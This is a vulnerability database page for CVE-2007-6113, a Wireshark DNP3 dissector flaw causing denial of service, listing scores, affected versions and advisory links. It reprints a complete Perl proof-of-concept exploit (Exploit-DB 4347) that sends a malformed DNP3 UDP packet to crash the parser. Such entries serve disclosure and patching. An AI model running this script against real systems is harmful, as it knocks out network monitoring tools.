CVE-2007-6113 : Detail

CVE-2007-6113

9.39%V4
Network
2007-11-23
19h00 +00:00
2018-10-15
18h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Integer signedness error in the DNP3 dissector in Wireshark (formerly Ethereal) 0.10.12 to 0.99.6 allows remote attackers to cause a denial of service (long loop) via a malformed DNP3 packet.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-189 Category : Numeric Errors
Weaknesses in this category are related to improper calculation or conversion of numbers.

Metrics

Metrics Score Severity CVSS Vector Source
V2 4.3 AV:N/AC:M/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 4347

Publication date : 2007-08-30 22h00 +00:00
Author : Beyond Security
EDB Verified : Yes

#!/usr/bin/perl # Automatically generated by beSTORM(tm) # Copyright Beyond Security (c) 2003-2007 ($Revision: 3741 $) # Attack vector: # M0:P0:B0.BT0:B0.BT0:B0.BT0:B0.BT0 # Module: # DNP3 use strict; use warnings; use Getopt::Std; use IO::Socket::INET; $SIG{INT} = \&abort; my $host = '192.168.4.52'; my $port = 20000; my $proto = 'udp'; my $sockType = SOCK_DGRAM; my $timeout = 1; #Read command line arguments my %opt; my $opt_string = 'hH:P:t:'; getopts( "$opt_string", \%opt ); if (defined $opt{h}) { usage() } $host = $opt{H} ? $opt{H} : $host; $port = $opt{P} ? $opt{P} : $port; $timeout = $opt{t} ? $opt{t} : $timeout; my @commands = ( {Command => 'Send', Data => "\x05\x64\x15\xC2\x01\x00\x00\x00\x00\x00\xC3\xC0\x01\x01\x00". "\x01\x07\x08\x01\x02\x03\x04\x05\x06\x07\x08"}, {Command => 'Receive'}, ); ### # End user configurable part ### #1. Create a new connection my $sock = new IO::Socket::INET ( PeerAddr => $host, PeerPort => $port, Proto => $proto, Type => $sockType, Timeout => $timeout, ) or die "socket error: $!\n\n"; print "connected to: $host:$port\n"; $sock->autoflush(1); binmode $sock; #2. communication part foreach my $command (@commands) { if ($command->{'Command'} eq 'Receive') { my $buf = receive($sock, $timeout); if (length $buf) { print "received: [$buf]\n"; } } elsif ($command->{'Command'} eq 'Send') { print "sending: [".$command->{'Data'}."]\n"; send ($sock, $command->{'Data'}, 0) or die "send failed, reason: $!\n"; } } #3. Close connection close ($sock); #The end sub receive { my $sock = shift; my $timeout = shift; my $tmpbuf; my $buf = ""; while(1) { # Example from perldoc -f alarm eval { local $SIG{ALRM} = sub { die "timeout\n" }; alarm $timeout; my $ret = read $sock, $tmpbuf, 1; #We read data one byte at a time. if ( !defined $ret or $ret == 0 ) { #EOF die "timeout\n"; } alarm 0; $buf .= $tmpbuf; }; if ($@) { #time out if($@ eq "timeout\n") { last; } else { die "receive aborted\n"; } } } #while return $buf; } sub abort { print "aborting...\n"; if ($sock) { close $sock; } die "User aborted operation\n"; } sub usage { print "usage: $0 [-hHPt]\n"; print "-h\t: this help message\n"; print "-H\t: override default host - $host\n"; print "-P\t: override default port - $port\n"; print "-t\t: set socket timeout in seconds\n"; exit 0; } # milw0rm.com [2007-08-31]

Products Mentioned

Configuraton 0

Wireshark>>Wireshark >> Version 0.6

    Wireshark>>Wireshark >> Version 0.7.9

      Wireshark>>Wireshark >> Version 0.8.16

        Wireshark>>Wireshark >> Version 0.8.19

          Wireshark>>Wireshark >> Version 0.8.20

            Wireshark>>Wireshark >> Version 0.9.2

              Wireshark>>Wireshark >> Version 0.9.5

                Wireshark>>Wireshark >> Version 0.9.6

                  Wireshark>>Wireshark >> Version 0.9.7

                    Wireshark>>Wireshark >> Version 0.9.8

                      Wireshark>>Wireshark >> Version 0.9.10

                        Wireshark>>Wireshark >> Version 0.9.14

                          Wireshark>>Wireshark >> Version 0.9.15

                            Wireshark>>Wireshark >> Version 0.10.2

                              Wireshark>>Wireshark >> Version 0.10.3

                                Wireshark>>Wireshark >> Version 0.10.4

                                  Wireshark>>Wireshark >> Version 0.10.5

                                    Wireshark>>Wireshark >> Version 0.10.6

                                      Wireshark>>Wireshark >> Version 0.10.7

                                        Wireshark>>Wireshark >> Version 0.10.8

                                          Wireshark>>Wireshark >> Version 0.10.9

                                            Wireshark>>Wireshark >> Version 0.10.12

                                              Wireshark>>Wireshark >> Version 0.10.13

                                                Wireshark>>Wireshark >> Version 0.10.14

                                                  Wireshark>>Wireshark >> Version 0.99

                                                    Wireshark>>Wireshark >> Version 0.99.0

                                                      Wireshark>>Wireshark >> Version 0.99.1

                                                        Wireshark>>Wireshark >> Version 0.99.2

                                                        Wireshark>>Wireshark >> Version 0.99.3

                                                        Wireshark>>Wireshark >> Version 0.99.4

                                                        Wireshark>>Wireshark >> Version 0.99.5

                                                        Wireshark>>Wireshark >> Version 0.99.6

                                                        References

                                                        http://secunia.com/advisories/27777
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://secunia.com/advisories/29048
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://www.securitytracker.com/id?1018635
                                                        Tags : vdb-entry, x_refsource_SECTRACK
                                                        http://www.securityfocus.com/bid/26532
                                                        Tags : vdb-entry, x_refsource_BID
                                                        http://secunia.com/advisories/28564
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://security.gentoo.org/glsa/glsa-200712-23.xml
                                                        Tags : vendor-advisory, x_refsource_GENTOO
                                                        http://www.redhat.com/support/errata/RHSA-2008-0059.html
                                                        Tags : vendor-advisory, x_refsource_REDHAT
                                                        http://secunia.com/advisories/28304
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://securitytracker.com/id?1018988
                                                        Tags : vdb-entry, x_refsource_SECTRACK
                                                        http://secunia.com/advisories/28325
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://www.mandriva.com/security/advisories?name=MDVSA-2008:1
                                                        Tags : vendor-advisory, x_refsource_MANDRIVA
                                                        https://www.exploit-db.com/exploits/4347
                                                        Tags : exploit, x_refsource_EXPLOIT-DB
                                                        http://www.mandriva.com/security/advisories?name=MDVSA-2008:001
                                                        Tags : vendor-advisory, x_refsource_MANDRIVA
                                                        http://securityreason.com/securityalert/3095
                                                        Tags : third-party-advisory, x_refsource_SREASON
                                                        http://www.redhat.com/support/errata/RHSA-2008-0058.html
                                                        Tags : vendor-advisory, x_refsource_REDHAT
                                                        http://secunia.com/advisories/28583
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://www.vupen.com/english/advisories/2007/3956
                                                        Tags : vdb-entry, x_refsource_VUPEN
                                                        http://secunia.com/advisories/28197
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://secunia.com/advisories/28288
                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                        http://secunia.com/advisories/28207
                                                        Tags : third-party-advisory, x_refsource_SECUNIA